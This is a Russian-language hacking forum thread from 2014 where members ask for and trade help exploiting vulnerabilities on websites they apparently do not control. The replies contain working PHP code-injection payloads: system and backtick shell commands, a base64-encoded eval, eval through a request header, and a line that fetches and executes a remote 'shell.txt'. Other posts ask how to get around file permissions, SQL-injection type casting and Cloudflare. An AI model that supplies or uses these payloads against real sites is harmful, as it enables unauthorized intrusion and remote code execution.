Старый 25.02.2014, 20:09   #3141
smirk
 
Регистрация: 30.01.2013
Сообщений: 15
Репутация: 0
По умолчанию

l1ght, да ну не, в параметре SERVER_ADDR одинаковый ip и сейчас заметил, что на одном соседе Loaded Configuration File = /home/site/php.ini , а на другом /usr/local/lib/php.ini , вот отсюда и вытекает
Цитата:
Нашел на соседнем, там magic_quotes_gpc=off , а на другом соседе magic_quotes_gpc=on
если я все правильно понимаю.
могу спалить линки в лс, если конечно надо и будет так удобнее (это не означает просьбу, чтобы вы за меня что-то делали и т.д. )

upd: сайт переехал на другой сервер, т.к. я им начал заниматься еще неделе две назад, потом забросил, только сейчас заметил это lol.

Последний раз редактировалось smirk; 25.02.2014 в 22:20..
smirk вне форума   Ответить с цитированием
Старый 03.03.2014, 05:54   #3142
RenderAss
 
Регистрация: 05.09.2013
Сообщений: 10
Репутация: -1
По умолчанию

Подскажите плиз, можно ли на php сделать файл доступным на запись если отключена php команда chmod() + safemode=1;
пояснение, сам файл который надо сделать врайтабельным, пренадлежит апачу, то есть тому же пользователю под которым я нахожусь, просто на нем стоят права 444. может быть есть другие команды которыми это можно сделать? кстати, с папками аналогичная ситуация, все закрыты на запись, поэтому удалить и создать файл заново я не могу.

если такое невозможно то тоже напишите.
RenderAss вне форума   Ответить с цитированием
Старый 04.03.2014, 20:37   #3143
Stream
 
Регистрация: 30.07.2011
Сообщений: 6
Репутация: 0
По умолчанию

PHP код:
$var = (int)$_GET['id']; 
После чего эта переменная вставляется в sql - запрос. Можно ли как-то обойти преобразование типов и хоть как-то раскрутить эту фильтрацию?
Прочитал новость: http://www.xakep.ru/post/62139/
Стало интересно, что всё таки не так в том скриншоте.

Последний раз редактировалось Stream; 04.03.2014 в 20:43..
Stream вне форума   Ответить с цитированием
Старый 04.03.2014, 22:10   #3144
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Stream С этим куском всё ок.
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 06.03.2014, 17:10   #3145
Lentyay
 
Регистрация: 06.03.2014
Сообщений: 1
Репутация: 0
По умолчанию

Акунетиксом насканил PHP code injection вида: site.com/?lol=${@print(md5(acunetix_wvs_security_test))} - код выполняется. Но если поставить хотябы пробел site.com/?lol=${@print(md5(acunetix_w vs_security_test))} валится ошибка: "Parse error: syntax error, unexpected 'vs_security_test' (T_STRING)" ,На такой запрос site.com/?lol=${@eval(system('uname'))} выдает "Parse error: syntax error, unexpected end of file in ..." . Так site.com/?lol=${@print(phpinfo())} работает нормально. Подскажите пожалуйста, можно ли эксплуатировать эту уязвимость?
Lentyay вне форума   Ответить с цитированием
Старый 06.03.2014, 19:33   #3146
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Цитата:
Сообщение от Lentyay Посмотреть сообщение
Акунетиксом насканил PHP code injection вида: site.com/?lol=${@print(md5(acunetix_wvs_security_test))} - код выполняется. Но если поставить хотябы пробел site.com/?lol=${@print(md5(acunetix_w vs_security_test))} валится ошибка: "Parse error: syntax error, unexpected 'vs_security_test' (T_STRING)" ,На такой запрос site.com/?lol=${@eval(system('uname'))} выдает "Parse error: syntax error, unexpected end of file in ..." . Так site.com/?lol=${@print(phpinfo())} работает нормально. Подскажите пожалуйста, можно ли эксплуатировать эту уязвимость?
site.com/?lol=${@system('uname -a')}
site.com/?lol=${@eval(file_get_contents('http://site.com/shell.txt'))} (в shell.txt убери в начале <?php и в конце ?>)
site.com/?lol=${@print(`ls -la`)} (обратные кавычки,если mq=On)
site.com/?lol=${@eval(getenv(http_asd))} (в хидер asd суешь код)

Последний раз редактировалось QaRTiN; 06.03.2014 в 19:36..
QaRTiN вне форума   Ответить с цитированием
Старый 07.03.2014, 08:19   #3147
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от Lentyay Посмотреть сообщение
Акунетиксом насканил PHP code injection вида: site.com/?lol=${@print(md5(acunetix_wvs_security_test))} - код выполняется. Но если поставить хотябы пробел site.com/?lol=${@print(md5(acunetix_w vs_security_test))} валится ошибка: "Parse error: syntax error, unexpected 'vs_security_test' (T_STRING)" ,На такой запрос site.com/?lol=${@eval(system('uname'))} выдает "Parse error: syntax error, unexpected end of file in ..." . Так site.com/?lol=${@print(phpinfo())} работает нормально. Подскажите пожалуйста, можно ли эксплуатировать эту уязвимость?
попробуй
Цитата:

${eval(base64_decode(c3lzdGVtKCdscyYmIGlkICYmIHVuY W1lIC1hJyk7))} только удали пробел, я хз почему он сюда лезет
${assert(base64_decode(c3lzdGVtKCdscyYmIGlkICYmIHV uYW1lIC1hJyk7))}
${`ls`};
upd:
ошибка валится потому, что php acunetix_wvs_security_test считает константой и переводит ее в строковый параметр. если там пробел, то это уже 2 константы.

если поломаешь, скинь в личку этот участок кода, пожалуйста.
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)

Последний раз редактировалось HeartLESS; 07.03.2014 в 08:32..
HeartLESS вне форума   Ответить с цитированием
Старый 08.03.2014, 16:30   #3148
kidcrash
 
Регистрация: 17.09.2013
Сообщений: 11
Репутация: 0
По умолчанию

Имеется доступ к phpmyadmin версии 2.5.5-pl1 с базой mysql версии 4.0.24. Судя по данному посту: https://rdot.org/forum/showpost.php?p=3104&postcount=1 условия во втором и третьем случаях удовлетворены, но вот с "Смотрим на ссылки, узнаем наш token" -- проблема, данной переменной нигде не видно. В чем может быть дело ?
kidcrash вне форума   Ответить с цитированием
Старый 08.03.2014, 17:42   #3149
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Цитата:
Сообщение от Lentyay Посмотреть сообщение
Акунетиксом насканил PHP code injection вида: site.com/?lol=${@print(md5(acunetix_wvs_security_test))} - код выполняется. Но если поставить хотябы пробел site.com/?lol=${@print(md5(acunetix_w vs_security_test))} валится ошибка: "Parse error: syntax error, unexpected 'vs_security_test' (T_STRING)" ,На такой запрос site.com/?lol=${@eval(system('uname'))} выдает "Parse error: syntax error, unexpected end of file in ..." . Так site.com/?lol=${@print(phpinfo())} работает нормально. Подскажите пожалуйста, можно ли эксплуатировать эту уязвимость?
что мешает использовать другую переменную:
Цитата:
site.com/?lol=${eval($_GET[q])}&q=echo 1 2 3;exit;
и вообще тут дело не в пробеле а в отсутсвии кавычек надо пологать
Цитата:
${@print(md5(acunetix_w vs_security_test))}
tex вне форума   Ответить с цитированием
Старый 26.03.2014, 21:25   #3150
lolka
 
Регистрация: 02.06.2013
Сообщений: 14
Репутация: 0
Angry

Имеется sql inj в хидере x-forwarded-for, проблема в том, что сайт за cloudflare.
1) ограничение на хидер <=100 символов, если >, ловим ошибку от cloudflare
Код:
Error 1000 DNS points to prohibited IP
2) file_priv = Y
Как прочитать файл? Никак не улаживаюсь в условие <=100 символов ...
Нашел настоящий ip сервера при обращении на прямую location('http://xxxxx.org'), где http://xxxxx.org за cloudflare ...
Может кто сталкивался, подтолкните на мысль
lolka вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot